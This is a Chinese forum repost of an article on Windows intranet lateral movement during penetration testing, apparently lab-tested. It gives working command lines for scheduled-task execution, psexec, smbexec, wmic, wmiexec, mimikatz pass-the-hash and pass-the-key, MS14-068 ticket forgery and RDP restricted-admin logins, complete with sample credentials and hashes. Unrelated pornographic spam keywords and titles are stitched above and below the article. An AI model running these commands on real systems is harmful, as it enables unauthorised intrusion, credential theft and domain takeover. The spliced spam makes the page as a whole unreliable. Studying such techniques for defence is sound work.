色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
电子发烧友
开通电子发烧友VIP会员 尊享10大特权
海量资料免费下载
精品直播免费看
优质内容免费畅学
课程9折专享价
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

基于口令的橫向移動進行內(nèi)網(wǎng)滲透測試

jf_Fo0qk3ln ? 來源:csdn ? 作者:大川兒 ? 2022-11-09 09:30 ? 次閱讀

前言

當我們拿下 webshell 后,若其服務(wù)器有內(nèi)網(wǎng)環(huán)境,在進一步測試中就需要進行內(nèi)網(wǎng)滲透測試,對于內(nèi)網(wǎng)滲透測試的方法常用的為:基于口令的橫向移動和基于漏洞的攻擊。本文主要從基于口令的橫向移動,自己收集了網(wǎng)上比較主流的方法,但是自己才疏學(xué)淺,有說法錯誤之處希望大佬們能夠在評論區(qū)中指出,感激不敬。

一、通過 at&schtasks 進行明文傳遞

說明:at&schtasks 都是 windows 上創(chuàng)建計劃任務(wù)的命令,只是針對的版本不同,at 是 win2008 及一下;

1、前提條件:


1)能夠獲得明文密碼

2)鏈接的目標主機需要administrator權(quán)限,普通權(quán)限不能夠進行文件操作(工作組或域)

3)跳板主機任意權(quán)限

4)可在本地和遠程執(zhí)行

2、執(zhí)行流程:

1)與目標主機建立IPC鏈接

2)拷貝要執(zhí)行命令的腳本到目標主機

3)查看當前時間,創(chuàng)建計劃任務(wù)(at&schtasks)

4)刪除IPC鏈接

3、命令語句:(這里的命令語句在下面很多方法中都會有體現(xiàn),所以下面若有用到該類似方法我將會簡寫)

pYYBAGNrAx-AM9WiAAEs3hupRVU795.jpg

二、、atexec 進行明文與HASH傳遞

1、前提條件:


1)能夠獲得明文密碼或密碼hash值

2)目標主機需要連接administrator用戶(工作組或域)

3)跳板主機任意權(quán)限

4)可在本地和遠程執(zhí)行

2、命令語句:

poYBAGNrAz6AN0usAAB2_KhtnZY589.jpg

三、SMB 服務(wù)利用

1、psexec 工具傳遞

說明:SMB 服務(wù)可以通過明文或 hash 傳遞進行攻擊,需要對方服務(wù)器 445 端口開放。psexec 工具有微軟官方自帶(不用考慮免殺),也有第三方制作(需要考慮免殺)。

前提條件:


1)能夠獲得明文密碼或密碼hash值(官方工具只能使用明文,第三方可以使用hash)

2)通過psexec工具的話只能在本地反彈shell,但是CS可以輔助我們使用psexec方法,遠程反彈會話

3)建立的連接需要連接administrator用戶,普通權(quán)限無法連接成功

4)跳板機任意權(quán)限

命令語句:

1)微軟官方工具,只能通過明文建立

poYBAGNrA2-AakgyAACkxKUqhMk768.jpg

2)第三方工具,可以通過 hash 值建立

pYYBAGNrA4WAGRzyAAB2QqGYMwM740.jpg

3) 通過 CS 進行傳遞,該方法我會在后期說 CS 的時候體現(xiàn)出來,比較簡單,這里就不細說了

2、smbexec 工具傳遞

說明:該工具為第三方工具,在實際情況中需要考慮免殺請況,同時服務(wù)器需要開通 445 端口 前提條件:


1)能夠獲得明文密碼或密碼hash值(官方工具只能使用明文,第三方可以使用hash)

2)只能本地反彈shell,無法遠程反彈

3)建立的連接需要連接administrator用戶,普通權(quán)限無法連接成功

4)跳板機任意權(quán)限

命令語句:

pYYBAGNrA8KALutbAABlBMjih-A260.jpg

四、WMI 服務(wù)利用

1、wmic 傳遞

說明:WMI 服務(wù)需要目標服務(wù)器開通 135 端口,同時需要目標服務(wù)器明文密碼,該方法不會在目標服務(wù)器中留下日志,但是沒有回顯

前提條件:


1)獲得明文密碼

2)可在本地和遠程執(zhí)行

3)需要administrator用戶賬號,普通權(quán)限連接不成功

4)跳板機任意權(quán)限

命令語句:

1)wmic/node:192.168.89.3/user:administrator/password:123.comprocesscallcreate"cmd.exe/cnetuser>C:1.txt"#工作組

2)wmic/node:192.168.89.3/user:hackeradministrator/password:1qaz@2wsxprocesscallcreate"cmd.exe/cipconfig>C:1.txt"#域內(nèi)

2、cscript 傳遞

說明:自帶的 cscript 為明文傳遞,有回顯,但是需要事先傳入 wmiexec.vbs 文件,需要目標服務(wù)器開啟 135 端口

前提條件:


1)獲得明文密碼

2)只能在本地執(zhí)行

3)需要administrator用戶賬號,普通權(quán)限連接不成功

4)跳板機任意權(quán)限 命令語句:

1)cscript//nologowmiexec.vbs/shell192.168.89.3administrator123.com#工作組

2)cscript//nologowmiexec.vbs/shell192.168.89.3hackeradministrator123.com#域內(nèi)

3、wmiexec 傳遞

說明:wmiexec 為第三方工具,需要注意免殺問題,也需要目標服務(wù)器開啟 135 端口

前提條件:


1)獲取明文密碼或hash值

2)只能在本地執(zhí)行

3)需要administrator用戶賬號,普通權(quán)限連接不成功

4)跳板機任意權(quán)限 命令語句:

1)wmiexec.exe./administrator:123.com@192.168.89.3"whoami"#工作組明文

2)wmiexec.exehacker/administrator:123.com@192.168.89.3"whoami"#域內(nèi)明文

3)wmiexec.exe-hashes:afffeba176210fad4628f0524bfe1942./administrator@192.168.89.3"whoami"#hash值

五、PTH 橫向傳遞攻擊

說明:PTH 攻擊建立在密碼 hash 之上。攻擊系統(tǒng)范圍為 win7win2008r2win2012 等。若系統(tǒng)打了 KB2871997 補丁只能 administrator 連接,沒有打補丁任何用戶都可以連接

前提條件:


1)獲取密碼hash

2)判斷是否打了補丁--KB2871997

3)跳板機權(quán)限為管理員權(quán)限

4)可以在本地和遠程執(zhí)行

5)值得注意的是,普通用戶建立的連接,似乎權(quán)限過小,很多操作無法進行,所以我判斷普通用戶似乎是無效的

命令語句:

1)本地執(zhí)行(基于 mimikatz 執(zhí)行)


#基于mimikatz執(zhí)行

1)sekurlsa::pth/user:sql2008/domain:hacker/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#域內(nèi)hash傳遞

2)sekurlsa::pth/user:administrator/domain:workgroup/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d#工作組hash

#彈出一個命令執(zhí)行框,在這個框中建立了類似的ipc$連接,

#我們可以查看目錄,下載文件,上傳文件,創(chuàng)建計劃任務(wù)執(zhí)行文件

#如:

dir\sql2008.hacker.comc$

dir\192.168.89.3c$

2)遠程執(zhí)行(基于 CS 執(zhí)行)


#基于CS執(zhí)行

1)mimikatzsekurlsa::pth/user:administrator/domain:workgroup/ntlm:afffeba176210fad4628f0524bfe1942

2)steal_tokenPID

3)shelldir\192.168.89.3c$

六、PTK 橫向傳遞攻擊

說明:PTK 傳遞攻擊針對的是打了 KB2871997 補丁的,未打補丁是不能用的,這里需要使用 mimikatz 獲取 AES keys,獲取命令為:sekurlsa::ekeys

前提條件:


1)判斷是否打了KB2871997補丁

2)獲取AES密碼

3)跳板機的管理員權(quán)限

4)能在本地運行,遠程沒有測試成功 命令語句為:

1)mimikatz.exe"sekurlsa::ekeys"#獲取aes

2)sekurlsa::pth/user:sql2008/domain:hacker/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

七、PTT攻擊

1、說明:PTT 攻擊是利用 Kerberos 協(xié)議進行攻擊的,常用的攻擊手法有:MS14-068,Golden ticket,SILVER ticket。它是將連接合法的票據(jù)注入到內(nèi)存中實現(xiàn)連接。 MS14-068 造成的危害是允許域內(nèi)任何一個普通用戶,將自己提升至域管權(quán)限。微軟給出的補丁是 kb3011780

2、前提條件:

1)利用ms14-068、kekeo、本地票據(jù)在本地測試成功,

2)利用ms14-068、kekeo跳板機本地連接時可以是任意權(quán)限

3)利用ms14-068需要知道域內(nèi)某用戶的賬號及明文密碼

4)kekeo需要知道域內(nèi)用戶名與hash值

5)本地票據(jù)需要管理員權(quán)限(mimikatz導(dǎo)出票據(jù)需要高權(quán)限)

1)利用ms14-068遠程連接需要管理員權(quán)限

3、命令語句:

1)利用 ms14-068


#1)本地連接

1)WMICuseraccountgetname,sid#sid獲取,管理員權(quán)限獲取的更多一點

2)ms14-068.exe-u域成員名@域名-ssid(域成員)-d域控制器地址-p域成員密碼(生成TGT)

3)MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com

4)mimikatz.exe"kerberos::ptcTGT_mary@god.org.ccache"#(TGT票據(jù)注入)

5)dir\DC.hacker.comc$(注意要用域內(nèi)域名連接,這里其實是類似建立了一條IPC$連接)

#2)遠程連接,在CS中執(zhí)行

1)WMICuseraccountgetname,sid//sid獲取

2)mimikatzkerberos::list//列出當前票據(jù)

3)mimikatzkerberos::purge//清除票據(jù)

4)MS14-068.exe-uweb07@hacker.com-sS-1-5-21-2374949671-2603306159-227762320-1105-d192.168.89.2-p123@com//生成tgt票據(jù)

5)mimikatzkerberos::ptcTGT_web07@hacker.com.ccache//導(dǎo)入票據(jù)

6)shelldir\sql2008.hacker.com//利用

2)利用工具 kekeo(未成功)


1)ekeo"tgt::ask/user:mary/domain:god.org/ntlm:518b98ad4178a53695dc997aa02d455c"#生成票據(jù)

2)kerberos::pttTGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi#導(dǎo)入票據(jù)

4)dir\DC.hacker.comc$#利用

八、RDP 傳遞攻擊 (測試失敗)

1、說明:RDP 傳遞其實就是利用了遠程桌面功能

2、前提條件:


1)獲得對方賬戶明文或hash(用戶需要是能夠有遠程桌面連接權(quán)限)

2)本地執(zhí)行

3)跳板機任意權(quán)限

3、命令語句:

sekurlsa::pth/user:administrator/domain:hacker.com/ntlm:2ba0f5fcb5c72afc4a6d612a005fe39d"/run:mstsc.exe/restrictedadmin"

總結(jié)

上述方法自己在本地搭建了靶場進行測試,可能有很多外在因數(shù)是自己沒有考慮到的,所以可能會存在錯誤,歡迎各位大佬批評指正。





審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • WINDOWS
    +關(guān)注

    關(guān)注

    4

    文章

    3606

    瀏覽量

    90901
  • Hash
    +關(guān)注

    關(guān)注

    0

    文章

    32

    瀏覽量

    13433
  • SMB
    SMB
    +關(guān)注

    關(guān)注

    0

    文章

    41

    瀏覽量

    11896

原文標題:內(nèi)網(wǎng)橫向移動常用方法總結(jié)(附工具)

文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 0人收藏

    評論

    相關(guān)推薦
    熱點推薦

    如何清除主板BIOS的口令?

    如何清除主板BIOS的口令?   為了保護計算機的資源和安全,可以為其加上開機密碼。但是一旦不小心將密碼忘記,就會致使計算機不能進入BIOS設(shè)置,或者不能啟動計算機。  1.可先
    發(fā)表于 01-05 15:38

    請問花生殼怎么進行內(nèi)網(wǎng)穿透的?

    花生殼是怎么進行內(nèi)網(wǎng)穿透的,能不能用來***,還是只有組建內(nèi)網(wǎng)的功能。
    發(fā)表于 04-18 06:02

    內(nèi)網(wǎng)穿透詳解-基于NATAPP&NatAssist測試

    ://natapp.cn)的客戶端進行內(nèi)網(wǎng)穿透的,使用非常方便,進而單獨調(diào)通4G模塊與內(nèi)網(wǎng)服務(wù)器的通信。【內(nèi)網(wǎng)穿透】本質(zhì)為NAT(Net Address Translation)網(wǎng)絡(luò)地址轉(zhuǎn)換,即通過
    發(fā)表于 09-13 12:14

    web滲透測試流程

    不需要)  漏洞利用:當我們拿到了該網(wǎng)站存在漏洞之后,就可以進一步拿到網(wǎng)站的webshell。  內(nèi)網(wǎng)轉(zhuǎn)發(fā):如果我們還想進一步的探測內(nèi)網(wǎng)主機的信息的話,我們就需要進行內(nèi)網(wǎng)轉(zhuǎn)發(fā)了。  內(nèi)網(wǎng)
    發(fā)表于 01-29 17:27

    WEB安全滲透測試流程到底是什么

    對系統(tǒng)的任何弱點、技術(shù)缺陷或漏洞的主動分析,這個分析是從一個攻擊者可能存在的位置來進行的,并且從這個位置有條件主動利用安全漏洞。換句話來說,滲透測試是指滲透人員在不同的位置(比如從
    的頭像 發(fā)表于 02-20 13:59 ?3279次閱讀

    四個方法探測服務(wù)器的內(nèi)網(wǎng)存活主機

    滲透中,當我們拿下一臺服務(wù)器作為跳板機進一步進行內(nèi)網(wǎng)滲透時,往往需要通過主機存活探測和端口掃描來收集內(nèi)網(wǎng)資產(chǎn)。
    的頭像 發(fā)表于 09-27 15:18 ?1.4w次閱讀
    四個方法探測服務(wù)器的<b class='flag-5'>內(nèi)網(wǎng)</b>存活主機

    內(nèi)網(wǎng)滲透:獲取Windows內(nèi)Hash密碼的方法

    內(nèi)網(wǎng)滲透中,當攻擊者獲取到內(nèi)網(wǎng)某臺機器的控制權(quán)后,會議被攻陷的主機為跳板,通過收集域內(nèi)憑證等各種方法,訪問域內(nèi)其他機器,進一步擴大資產(chǎn)范圍。
    的頭像 發(fā)表于 12-24 16:01 ?1134次閱讀

    內(nèi)網(wǎng)環(huán)境下的滲透測試

    我們總是先通過對外提供服務(wù)的,防守最薄弱的主機打進去,然后搭建隧道,通過該主機訪問內(nèi)部的其他主機。快速橫向移動到到內(nèi)網(wǎng)中的核心資產(chǎn),獲取核心敏感數(shù)據(jù)和權(quán)限,完成一次疼痛的打擊。
    的頭像 發(fā)表于 09-14 09:36 ?2018次閱讀

    白盒滲透測試的優(yōu)勢是什么

    滲透測試是一項重要的進攻性安全演習(xí)或操作。如果執(zhí)行得當,它會極大地提高您組織的安全性。滲透測試分為三種類型,根據(jù)滲透
    的頭像 發(fā)表于 09-19 10:04 ?1399次閱讀

    APK滲透測試工具:AppMessenger

    APK滲透測試工具:AppMessenger,一款適用于以APP病毒分析、APP漏洞挖掘、APP開發(fā)、HW行動/紅隊/滲透測試團隊為場景的移動
    的頭像 發(fā)表于 11-18 09:32 ?3192次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具SweetBabyScan

    輕量級內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具:SweetBabyScan,是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具,集成了Xray與Nuclei的Poc
    的頭像 發(fā)表于 12-02 09:23 ?5765次閱讀

    一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具

    甜心寶貝是一款支持弱口令爆破的內(nèi)網(wǎng)資產(chǎn)探測漏洞掃描工具,集成了Xray與Nuclei的Poc。
    的頭像 發(fā)表于 12-14 09:48 ?4284次閱讀

    記一次內(nèi)網(wǎng)中反彈shell的艱難歷程

    最近在客戶現(xiàn)場對內(nèi)網(wǎng)服務(wù)器進行滲透測試,發(fā)現(xiàn)了大量的弱口令,本次歷程就是從這里開始。
    的頭像 發(fā)表于 03-07 09:30 ?1371次閱讀

    如何使用DudeSuite進行滲透測試工作

    技術(shù)的理解使用DudeSuite進行滲透測試工作,半自動Web滲透測試就目前的來說依然是主流,相比起全自動化的掃描器及批量化腳本可以在
    的頭像 發(fā)表于 06-13 09:04 ?2093次閱讀
    如何使用DudeSuite<b class='flag-5'>進行</b><b class='flag-5'>滲透</b><b class='flag-5'>測試</b>工作

    內(nèi)網(wǎng)穿透工具的種類、原理和使用方法

    本文以滲透的視角,總結(jié)幾種個人常用的內(nèi)網(wǎng)穿透,內(nèi)網(wǎng)代理工具,介紹其簡單原理和使用方法。
    的頭像 發(fā)表于 08-25 10:35 ?3352次閱讀
    <b class='flag-5'>內(nèi)網(wǎng)</b>穿透工具的種類、原理和使用方法
    主站蜘蛛池模板: 蜜臀AV熟女人妻中文字幕 | 日本经典片免费看 | 黄色免费在线网址 | 欧美精品一区二区三区视频 | 国产精品亚洲污污网站入口 | 高清AV熟女一区 | 一本道久在线综合道 | 麻豆AV久久AV盛宴AV | CHINA中国东北GURMA | 国产探花在线精品一区二区 | 秋霞电影院兔费理论观频84mb | 草莓视频在线观看免费观看高清 | 国产最新进精品视频 | 国产精品久久免费视频 | 色综合伊人色综合网站下载 | 色吧电影院 | 亚洲免费精品 | 美美哒高清在线播放8 | 色哟哟tv| 成人在线观看国产 | caoporn 超碰免费视频 | 国产在线一区二区三区四区 | 亚洲AV无码影院在线播放 | 啪啪做羞羞事小黄文 | 精品三级久久久久电影网1 精品日韩视频 | 亚洲欧美综合视频 | 日韩一区二区在线免费观看 | 一个人在线观看免费高清视频在线观看 | 亚洲欧美中文字幕网站大全 | 国产 交换 丝雨 巅峰 | 2020美女视频黄频大全视频 | 黑人猛挺进小莹的体内视频 | 久久久无码精品亚洲A片猫咪 | 果冻传媒在线观看高清完整免费 | 原神美女被超污app 御姐被吸奶 | 久久成人a毛片免费观看网站 | 女性私密五月天 | 国产精品久久久久影院嫩草 | 在线 亚洲 日韩 欧洲视频 | 美女胸网站 | 大学生高潮无套内谢视频 |

    電子發(fā)燒友

    中國電子工程師最喜歡的網(wǎng)站

    • 2931785位工程師會員交流學(xué)習(xí)
    • 獲取您個性化的科技前沿技術(shù)信息
    • 參加活動獲取豐厚的禮品